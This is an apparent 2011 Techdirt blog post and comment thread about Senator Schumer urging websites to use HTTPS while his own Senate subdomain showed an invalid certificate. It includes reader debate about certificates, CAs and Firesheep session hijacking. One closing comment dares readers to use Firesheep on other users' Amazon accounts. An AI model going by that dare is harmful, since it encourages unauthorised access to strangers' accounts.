Senator Schumer Fails To Properly Use HTTPS On His Own Site, After Pushing Other Sites To Use It [Updated]

from the ooooops dept

This is just lovely. We just wrote about how Senator Chuck Schumer was pressuring websites to use https instead of http, saying (not really accurately) that http has a "security flaw." However, gojomo pointed out in a comment on that post that Schumer's own page, when you hit it via https at https://schumer.senate.gov/ reports:
"schumer.senate.gov uses an invalid security certificate."

Ooops. Both Firefox and Chrome warn you not to proceed, because the connection is "untrusted" or "might not be the site you are looking for." Obviously, this is probably just a small technical error by Schumer's tech staff, but it does look pretty bad when he's out there grandstanding on https. Of course, this isn't to diminish that https is a useful tool that many websites should use to protect users, but it's not clear that we want politicians telling websites what protocols to use (especially when they haven't quite figured them out themselves).

Update: Some great points in the comments highlighting that Schumer and his staff don't control the tech behind his Senate website, and any such cert would have to be controlled by the Senate IT folks. Also they pointed out that Schumer's Senate site does not appear to take user info/logins so HTTPS wouldn't much matter. However, his personal/campaign site does appear to take info and also does not use HTTPS.

Separately, others pointed out that one of the sites he called out -- Amazon -- does use HTTPS when you login and/or order, and his calling them out suggests they're unsafe when it appears they are safe.


Reader Comments (rss)

(Flattened / Threaded)

  •  
    icon
    :Lobo Santo (profile), Mar 1st, 2011 @ 1:46pm

    On the other hand

    Perhaps he's attempting to demonstrate how difficult https is to implement, and will next be grandstanding about a better, faster, more secure, easier to implement method of connecting to web pages.

     

    reply to this | link to this | view in chronology ]

    •  
      icon
      lux (profile), Mar 1st, 2011 @ 2:35pm

      Re: On the other hand

      "Perhaps he's attempting to demonstrate how difficult https is to implement"

      Er, you're joking? Either get a signed cert from a CA or create your own - either way, certs aren't too difficult to maintain/implement.

       

      reply to this | link to this | view in chronology ]

  •  
    identicon
    Anonymous Coward, Mar 1st, 2011 @ 1:47pm

    You don't have permission to access / on this server.

    There isn't anything on the secure server. It's a dead address. His site isn't "secure" in that manner, so it isn't surprising it doesn't work.

    That and the fact that the certificate would be controlled by senate.gov, and not the senator or his staff.

     

    reply to this | link to this | view in chronology ]

    •  
      icon
      Mike Masnick (profile), Mar 1st, 2011 @ 2:38pm

      Re:

      That and the fact that the certificate would be controlled by senate.gov, and not the senator or his staff.


      That's a good point -- though, again seems to highlight the problem of him telling private companies that they have to do this, right?

       

      reply to this | link to this | view in chronology ]

      •  
        identicon
        Anonymous Coward, Mar 1st, 2011 @ 2:50pm

        Re: Re:

        HTTPS is not security anyway. It's a false sense of security. Ask the OpenBSD people, they'll lecture you about it. There's still ways "around" it, and/or if you hack your way into the machine to replace it, etc...

        It's like putting an electronic lock on your car.. it might help if you lose the key, but down the line, someone can still steal your car with fairly low-tech tools.

         

        reply to this | link to this | view in chronology ]

      •  
        identicon
        Anonymous Coward, Mar 1st, 2011 @ 7:41pm

        Re: Re:

        Not really. senate.gov 's certificate gets pulled when you pull any third level (there is that pesky reason why third levels are not the same). So you can https any of the individual sites, and get the same reaction. It's as much a browser fault as anything else. I don't think that Mr Schumer had any https site specifically setup.

         

        reply to this | link to this | view in chronology ]

  •  
    identicon
    Jon B., Mar 1st, 2011 @ 2:03pm

    Right, I'm pretty sure his staff doesn't control senate.gov, and as such wouldn't be able (unilaterally anyway) set up a cert for schumer.senate.gov. And it's not link someone linked to https://schumer.senate.gov - some guy just went and tried to access it in response to the article from earlier this morning. It's no surprise at all the server isn't configured to serve individual officials' subdomains as HTTPS. They *could* get a *.senate.gov cert, but there's good reasons not to do that, too.

    I'm not a fan of the guy but I don't know why we're giving him grief over something he can't control. It's apparently based on him 'recommending' something and therefore might speculatively push for legislation in some regard. I dunno. Maybe I missed something.

     

    reply to this | link to this | view in chronology ]

    •  
      icon
      weneedhelp (profile), Mar 1st, 2011 @ 2:11pm

      Re: Maybe I missed something

      "him 'recommending' something and therefore might speculatively push"

      That's the problem, so many politicians recommend stuff without actually understanding how it works.

       

      reply to this | link to this | view in chronology ]

  •  
    identicon
    Anonymous Coward, Mar 1st, 2011 @ 2:05pm

    Lame Story...nothing to see here

     

    reply to this | link to this | view in chronology ]

  •  
    icon
    Drew (profile), Mar 1st, 2011 @ 2:08pm

    So what?

    Why the hell are you railing against someone making a REALLY good point? Sure his implementation was poor, but what's the point in ripping him for "grandstanding" and then claiming that politicians should be "telling websites what protocol to use?"

    I mean, he's right. Stop trying to gin up controversy.

     

    reply to this | link to this | view in chronology ]

    •  
      identicon
      Stuart, Mar 1st, 2011 @ 3:00pm

      Re: So what?

      A really good point is one thing. A government telling everyone how to do shit with new laws is something else altogether.

       

      reply to this | link to this | view in chronology ]

      •  
        icon
        Drew (profile), Mar 1st, 2011 @ 3:23pm

        Re: Re: So what?

        There doesn't appear to be any such law proposed. For the time being, it sounds like this is just a politician supporting a good idea.

         

        reply to this | link to this | view in chronology ]

  •  
    identicon
    blah, Mar 1st, 2011 @ 2:18pm

    https is broken

    Rather than promoting https as the way to solve security problems (really, I would promote it as a way to help solve privacy issues, tbh) - perhaps we should actually fix it first.

    https and SSL are a great way for a small number of Certificate Authority companies to make a boatload of cash for doing very little. I wouldn't be surprised if Verisign approached this guy and lobbied for this.

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    Jeff Kim, Mar 1st, 2011 @ 2:20pm

    CDNetworks provides last mile HTTPS feature

    CDNetworks protects its customers from the Firesheep security threat with a “last-mile-secure” feature within its Content Acceleration SSL product. This innovative solution requires no changes to the websites of CDNetworks’ customers. Instead, CDNetworks communicates with websites in clear HTTP, and then transforms their responses to end users via SSL over HTTPS. This renders the Firesheep plug-in completely ineffective. http://www.businesswire.com/news/home/20101104005744/en/CDNetworks-Protects-Firesheep-Last-Mile- Secure-Feature

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    Dean Landolt, Mar 1st, 2011 @ 2:22pm

    Mike, I love you man, but you're really out of your element here. It's already been pointed out how Schumer's staff wouldn't control the cert, and that it's a dead endpoint anyway, and that (surprisingly!) the senator is actually *correct*...

    But more importantly: if you understood the attack vector in question you'd understand that it is only really relevant for hijacking user sessions in progress. If you'd looked at the port 80 version of the site you may notice the lack of a login feature anywhere, thus your complaint is completely baseless. In this case you're the one doing the grandstanding.

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    Anonymous Coward, Mar 1st, 2011 @ 2:45pm

    Firefox can't find the server at schumer.senate.gov.

    $ host schumer.senate.gov
    ;; connection timed out; no servers could be reached

    Fail.

     

    reply to this | link to this | view in chronology ]

    •  
      identicon
      Anonymous Coward, Mar 1st, 2011 @ 2:46pm

      Re:

      $ dig @sen-dmzp.senate.gov schumer.senate.gov
      dig: couldn't get address for 'sen-dmzp.senate.gov': not found

      Fail...er.

       

      reply to this | link to this | view in chronology ]

  •  
    icon
    iamtheky (profile), Mar 1st, 2011 @ 2:49pm

    "(especially when they haven't quite figured them out themselves)"

    is a fitting way to end a post that is also not to keen on the way the internet works. But its just small technical errors on your staffs part, but it does look pretty bad when you are out there grandstanding about grandstanding.

     

    reply to this | link to this | view in chronology ]

  •  
    icon
    Steven (profile), Mar 1st, 2011 @ 2:49pm

    This is why I love Techdirt

    This is one of the reasons I love this site. In no time at all the commenters have basically nailed Mike on several different points and added much more information to the story. The folks here don't seem to have much of a 'follow whatever Mike says' tendency.

    While I don't think this is really a story I do think this is an anecdotal situation of a much larger problem. Politicians just deciding to get involved in situations the government has no reason to be in.

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    JH, Mar 1st, 2011 @ 2:56pm

    Since there aren't any forms on Schumer's site that prompt users for personal info AFAICT, HTTPS doesn't really seem necessary to me.

    What does bother me about this is it seems like defamation for Schumer to call out Amazon specifically when Amazon already uses HTTPS for sign-in and checkout. People who don't know the details of SSL are going to hear this and think they aren't safe shopping on/signing into Amazon at all. This could boil down to a loss of business for Amazon if people take this as "Amazon is insecure". I'm not sure what else Schumer wants from Amazon. Does he want browsing of the site to be done through HTTPS as well? If so then Mike is correct, Schumer's site should be protected by HTTPS too. If he's really concerned about HTTPS he could redirect http://schumer.senate.gov (which others have pointed out he most likely has no control over) to https://chuckschumer.com/ (which I'm sure he has control over)

    Actually...looking at chuckschumer.com there is a place to submit your email address and zip code, and there is no secure option...

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    addie, Mar 1st, 2011 @ 3:51pm

    https is misunderstood

    Https is for encrypting the connection between the browser and the remote server. Https is not for authentication, as much as the cert authorities want you to confuse the two. There is a tor person blog post about life without a CA that highlights this fact.

     

    reply to this | link to this | view in chronology ]

    •  
      identicon
      mirradric, Mar 1st, 2011 @ 9:20pm

      Re: https is misunderstood

      actually https IS used for authentication and this authentication is in fact a very important part of https. The catch is that the party being authenticated is the web server, rather than the client/end user, by way of it's certificate.
      This is a very important step in preventing a man in the middle attacks. After all, if you have been talking to the wrong party to begin with, no amount of encryption will help you.
      This authentication is supposed to be provided by the certificate authorities which signs the individual server certificates to create a "web of trust". Of course, there are other ways to determine that certificates (like self signed ones) are valid (like issuing your own certificate authority cert, compare fingerprints etc.). If such arrangements for verifying the certificate are in place, using the certificate is perfectly safe, even if it is self-signed or details such as domain name are wrong.

       

      reply to this | link to this | view in chronology ]

  •  
    icon
    Thomas (profile), Mar 1st, 2011 @ 4:48pm

    I'm surprised..

    that a Senator would even know what "https" stands for, much less what it's used for or how it works.

     

    reply to this | link to this | view in chronology ]

  •  
    icon
    Ray Trygstad (profile), Mar 1st, 2011 @ 11:07pm

    Federal Certificate Authorities

    The federal government maintains an entire infrastructure of their own Certificate Authorities, none of which are recognized by the folks who make the browsers. As a retired Naval Officer, I access DOD sites all the time and find that my browser is constantly warning me about these sites. One time I attempted to download and install certificates for all of the DOD CAs but locating them all, downloading them and installing them took me about two hours and I swore I'd never do it again.

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    known coward, Mar 2nd, 2011 @ 12:47pm

    you all are way overthinking this one.

    Simple answer:

    Schumer is a grandstanding idiot.

     

    reply to this | link to this | view in chronology ]

  •  
    identicon
    Dean Landolt, Mar 3rd, 2011 @ 1:45pm

    Mike

    I'm glad to see you updated the article -- but the update is *still* inaccurate. I probably should have been more clear about this in my first comment -- the problem isn't whether sites use SSL during the login or payment phases (this is been considered a best practice for years now). You've got to use SSL for the lifetime of the session, at the _very_ least for users on unencrypted wifi where MITM attacks have been made so very easy by tools like firesheep.

    Since there's no way to know which users are on coffee shop wifi it is now considered a best practice to push everyone to SSL. If you don't believe me download firesheep and see what you can get away with on another user's amazon account. You may not be able to buy anything but you'll be able to do quite a bit of damage.

     

    reply to this | link to this | view in chronology ]


Add Your Comment

Have a Techdirt Account? Sign in now. Want one? Register here
Get Techdirt’s Daily Email
Save me a cookie
  • Note: A CRLF will be replaced by a break tag (<br>), all other allowable HTML will remain intact
  • Allowed HTML Tags: <b> <i> <a> <em> <br> <strong> <blockquote> <hr> <tt>
Follow Techdirt
A word from our sponsors...
Essential Reading
Techdirt Reading List
Techdirt Insider Chat
A word from our sponsors...
Recent Stories
A word from our sponsors...

Close

Email This